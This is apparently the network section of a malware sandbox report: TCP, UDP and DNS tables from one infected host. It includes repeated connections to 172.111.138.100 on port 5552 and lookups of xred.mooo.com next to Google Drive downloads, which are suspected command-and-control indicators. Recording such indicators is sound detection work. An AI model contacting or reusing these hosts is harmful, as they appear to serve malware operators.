Dec 30, 2024 11:25:46.839651108 CET	443	50027	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:46.839986086 CET	50027	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:46.840723038 CET	443	50027	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:46.840769053 CET	50027	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:46.840792894 CET	443	50027	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:46.840836048 CET	50027	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:46.866167068 CET	443	50028	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:46.866286993 CET	50028	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:46.866297007 CET	443	50028	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:46.867084980 CET	443	50028	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:46.867172956 CET	50028	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:47.134941101 CET	50027	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:47.134952068 CET	443	50027	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:47.135616064 CET	50032	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:47.135657072 CET	443	50032	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:47.135786057 CET	50033	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:47.135812044 CET	443	50033	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:47.135823965 CET	50032	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:47.135868073 CET	50033	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:47.136281967 CET	50032	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:47.136296034 CET	443	50032	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:47.136617899 CET	50028	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:47.136636972 CET	443	50028	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:47.137106895 CET	50034	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:47.137125015 CET	443	50034	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:47.137224913 CET	50034	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:47.137331009 CET	50035	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:47.137346029 CET	443	50035	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:47.137471914 CET	50035	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:47.137669086 CET	50035	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:47.137684107 CET	443	50035	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:47.154150009 CET	50033	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:47.154169083 CET	443	50033	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:47.154314995 CET	50034	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:47.154331923 CET	443	50034	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:47.737910986 CET	443	50035	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:47.738015890 CET	50035	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:47.738914013 CET	50035	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:47.738919020 CET	443	50035	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:47.739137888 CET	50035	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:47.739145041 CET	443	50035	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:47.750859976 CET	443	50034	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:47.750971079 CET	50034	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:47.753650904 CET	443	50033	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:47.753787041 CET	50033	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:47.755361080 CET	50034	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:47.755382061 CET	443	50034	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:47.755604982 CET	443	50034	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:47.755755901 CET	50034	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:47.756175041 CET	50034	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:47.757930040 CET	443	50032	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:47.758021116 CET	50032	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:47.759401083 CET	50032	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:47.759408951 CET	443	50032	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:47.759800911 CET	443	50032	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:47.759912968 CET	50032	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:47.760174036 CET	50032	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:47.796859026 CET	50033	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:47.796859026 CET	50033	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:47.796865940 CET	443	50033	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:47.796875000 CET	443	50033	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:47.799330950 CET	443	50034	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:47.803333044 CET	443	50032	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.109797955 CET	443	50035	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.109884024 CET	50035	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.109918118 CET	443	50035	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.110024929 CET	50035	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.110114098 CET	50035	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.110157967 CET	443	50035	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.110214949 CET	50035	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.111069918 CET	50047	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.111093044 CET	443	50047	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.111341000 CET	50047	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.111567020 CET	50047	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.111577988 CET	443	50047	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.127934933 CET	443	50033	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.128031969 CET	50033	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.128061056 CET	443	50033	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.128103971 CET	50033	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.128729105 CET	443	50033	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.128782988 CET	443	50033	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.128849030 CET	50033	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.139067888 CET	50033	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.139111042 CET	443	50033	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.139894009 CET	50048	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.139940023 CET	443	50048	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.140019894 CET	50048	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.140528917 CET	50048	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.140559912 CET	443	50048	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.186712027 CET	443	50034	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.186753988 CET	443	50034	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.186835051 CET	50034	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.186850071 CET	443	50034	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.186860085 CET	443	50034	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.186935902 CET	50034	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.187521935 CET	50034	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.187526941 CET	443	50034	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.188863039 CET	50049	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.188903093 CET	443	50049	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.188983917 CET	50049	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.192473888 CET	443	50032	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.192528963 CET	443	50032	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.192549944 CET	50032	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.192560911 CET	443	50032	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.192581892 CET	50032	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.192615986 CET	50032	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.192626953 CET	443	50032	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.192658901 CET	443	50032	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.192718029 CET	50032	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.192718029 CET	50032	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.203228951 CET	50049	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.203241110 CET	443	50049	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.204511881 CET	50032	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.204523087 CET	443	50032	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.212595940 CET	50050	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.212651014 CET	443	50050	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.212712049 CET	50050	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.213032961 CET	50050	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.213048935 CET	443	50050	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.739397049 CET	443	50047	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.739594936 CET	50047	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.740128994 CET	443	50047	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.740420103 CET	50047	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.744488001 CET	443	50048	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.745275974 CET	443	50048	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.745312929 CET	50048	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.745330095 CET	443	50048	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.745475054 CET	50048	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.751328945 CET	50047	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.751343966 CET	443	50047	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.751637936 CET	443	50047	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.751844883 CET	50047	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.752626896 CET	50048	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.752639055 CET	443	50048	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.752952099 CET	443	50048	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.753060102 CET	50047	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.753684998 CET	50048	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.753947020 CET	50048	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:48.799325943 CET	443	50048	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.799334049 CET	443	50047	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:48.812191963 CET	443	50049	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.812410116 CET	50049	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.812788963 CET	50049	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.812798977 CET	443	50049	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.813076973 CET	50049	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.813081980 CET	443	50049	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.834177971 CET	443	50050	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.834301949 CET	50050	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.834825039 CET	50050	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.834825039 CET	50050	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:48.834840059 CET	443	50050	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.834857941 CET	443	50050	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:48.868885994 CET	5552	50030	172.111.138.100	192.168.2.10
Dec 30, 2024 11:25:48.869340897 CET	50030	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:48.903878927 CET	50030	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:48.908735991 CET	5552	50030	172.111.138.100	192.168.2.10
Dec 30, 2024 11:25:49.115906000 CET	443	50048	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.116029978 CET	50048	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.116203070 CET	50048	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.116256952 CET	443	50048	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.116408110 CET	443	50048	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.116652966 CET	50048	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.116652966 CET	50048	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.116820097 CET	50056	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.116857052 CET	443	50056	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.120091915 CET	50056	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.120436907 CET	50056	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.120452881 CET	443	50056	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.123745918 CET	443	50047	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.123986959 CET	50047	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.124002934 CET	443	50047	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.124736071 CET	443	50047	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.124861956 CET	50047	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.124932051 CET	50047	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.124932051 CET	50047	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.124944925 CET	443	50047	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.125966072 CET	50057	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.126007080 CET	443	50057	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.126071930 CET	50047	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.126097918 CET	50057	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.135997057 CET	50057	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.136013985 CET	443	50057	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.231268883 CET	443	50049	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:49.231322050 CET	443	50049	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:49.231400967 CET	50049	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:49.231401920 CET	50049	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:49.231429100 CET	443	50049	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:49.231442928 CET	443	50049	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:49.231628895 CET	50049	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:49.232558012 CET	50049	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:49.232569933 CET	443	50049	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:49.233413935 CET	50058	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:49.233468056 CET	443	50058	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:49.234781981 CET	50058	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:49.235969067 CET	50058	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:49.235985994 CET	443	50058	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:49.386348963 CET	443	50050	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:49.386404037 CET	443	50050	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:49.386409044 CET	50050	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:49.386440992 CET	443	50050	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:49.386455059 CET	50050	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:49.386503935 CET	443	50050	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:49.386524916 CET	50050	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:49.386548996 CET	50050	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:49.394521952 CET	50050	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:49.394546986 CET	443	50050	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:49.395009041 CET	50063	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:49.395054102 CET	443	50063	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:49.395126104 CET	50063	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:49.395443916 CET	50063	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:49.395457983 CET	443	50063	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:49.719374895 CET	443	50056	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.720029116 CET	50056	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.724679947 CET	50056	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.724701881 CET	443	50056	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.724989891 CET	50056	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.725001097 CET	443	50056	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.734041929 CET	443	50057	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.735512972 CET	50057	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.751111984 CET	50057	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.751120090 CET	443	50057	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.751491070 CET	50057	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:49.751497030 CET	443	50057	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:49.834806919 CET	443	50058	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:49.834872961 CET	50058	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:49.993887901 CET	443	50063	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:49.993949890 CET	50063	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:50.086107969 CET	443	50056	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:50.086162090 CET	50056	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:50.086195946 CET	443	50056	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:50.086287975 CET	50056	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:50.086678982 CET	443	50056	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:50.086730957 CET	443	50056	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:50.086730957 CET	50056	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:50.086767912 CET	50056	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:50.105232000 CET	443	50057	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:50.105314970 CET	50057	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:50.106170893 CET	443	50057	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:50.106215954 CET	50057	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:50.106219053 CET	443	50057	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:50.106271982 CET	50057	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:55.752101898 CET	50101	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:55.757029057 CET	5552	50101	172.111.138.100	192.168.2.10
Dec 30, 2024 11:25:55.757114887 CET	50101	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:55.757926941 CET	50101	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:55.762746096 CET	5552	50101	172.111.138.100	192.168.2.10
Dec 30, 2024 11:25:56.017759085 CET	80	49792	69.42.215.252	192.168.2.10
Dec 30, 2024 11:25:56.017818928 CET	49792	80	192.168.2.10	69.42.215.252
Dec 30, 2024 11:25:56.309334993 CET	50057	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:56.309386015 CET	443	50057	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:56.309401035 CET	50057	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:56.309567928 CET	50057	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:56.309875965 CET	50056	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:56.309906960 CET	443	50056	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:56.311465979 CET	50063	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:56.311486959 CET	443	50063	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:56.312290907 CET	50058	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:56.312306881 CET	443	50058	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:56.313016891 CET	50104	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:56.313046932 CET	443	50104	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:56.313114882 CET	50104	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:56.314071894 CET	50104	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:56.314085007 CET	443	50104	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:56.314832926 CET	50058	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:56.314838886 CET	443	50058	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:56.315310955 CET	50063	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:56.315324068 CET	443	50063	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:56.319601059 CET	50105	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:56.319659948 CET	443	50105	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:56.319732904 CET	50105	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:56.319930077 CET	50105	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:56.319947958 CET	443	50105	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:56.766285896 CET	443	50063	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:56.766349077 CET	443	50063	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:56.766374111 CET	50063	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:56.766407967 CET	443	50063	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:56.766415119 CET	50063	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:56.766465902 CET	443	50063	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:56.766516924 CET	50063	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:56.785161018 CET	443	50058	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:56.785218954 CET	443	50058	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:56.785276890 CET	50058	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:56.785284996 CET	443	50058	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:56.785325050 CET	443	50058	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:56.785365105 CET	50058	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:56.943152905 CET	443	50104	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:56.943223953 CET	50104	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:56.945970058 CET	443	50105	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:56.946063042 CET	50105	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:26:00.123033047 CET	5552	50101	172.111.138.100	192.168.2.10
Dec 30, 2024 11:26:00.124041080 CET	50101	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:26:00.166882992 CET	50101	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:26:00.171644926 CET	5552	50101	172.111.138.100	192.168.2.10
Dec 30, 2024 11:26:02.717464924 CET	49792	80	192.168.2.10	69.42.215.252
Dec 30, 2024 11:26:02.718107939 CET	50063	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:26:02.718662024 CET	50105	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:26:02.718791008 CET	50104	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:26:02.718802929 CET	50058	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:26:04.851617098 CET	50115	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:26:04.856539011 CET	5552	50115	172.111.138.100	192.168.2.10
Dec 30, 2024 11:26:04.856606007 CET	50115	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:26:04.858055115 CET	50115	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:26:04.862914085 CET	5552	50115	172.111.138.100	192.168.2.10
Dec 30, 2024 11:26:32.615180969 CET	5552	50115	172.111.138.100	192.168.2.10
Dec 30, 2024 11:26:32.657447100 CET	50115	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:27:06.019336939 CET	5552	50115	172.111.138.100	192.168.2.10
Dec 30, 2024 11:27:06.110658884 CET	50115	5552	192.168.2.10	172.111.138.100

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 11:25:24.553282976 CET	63627	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:25:24.560096979 CET	53	63627	1.1.1.1	192.168.2.10
Dec 30, 2024 11:25:25.382147074 CET	58761	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:25:25.389611959 CET	53	58761	1.1.1.1	192.168.2.10
Dec 30, 2024 11:25:25.402266979 CET	54988	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:25:25.409996986 CET	53	54988	1.1.1.1	192.168.2.10
Dec 30, 2024 11:25:25.729696035 CET	53940	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:25:25.736377001 CET	53	53940	1.1.1.1	192.168.2.10
Dec 30, 2024 11:25:31.974128962 CET	62087	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:25:31.981676102 CET	53	62087	1.1.1.1	192.168.2.10
Dec 30, 2024 11:25:36.544433117 CET	63895	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:25:36.552695036 CET	53	63895	1.1.1.1	192.168.2.10
Dec 30, 2024 11:25:42.264338970 CET	49602	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:25:42.272313118 CET	53	49602	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 30, 2024 11:25:24.553282976 CET	192.168.2.10	1.1.1.1	0xd5d0	Standard query (0)	docs.google.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:25:25.382147074 CET	192.168.2.10	1.1.1.1	0xb63c	Standard query (0)	xred.mooo.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:25:25.402266979 CET	192.168.2.10	1.1.1.1	0xf77	Standard query (0)	freedns.afraid.org	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:25:25.729696035 CET	192.168.2.10	1.1.1.1	0x6550	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:25:31.974128962 CET	192.168.2.10	1.1.1.1	0x492	Standard query (0)	xred.mooo.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:25:36.544433117 CET	192.168.2.10	1.1.1.1	0x1c50	Standard query (0)	xred.mooo.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:25:42.264338970 CET	192.168.2.10	1.1.1.1	0x38a7	Standard query (0)	xred.mooo.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 30, 2024 11:25:12.154983997 CET	1.1.1.1	192.168.2.10	0x8606	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
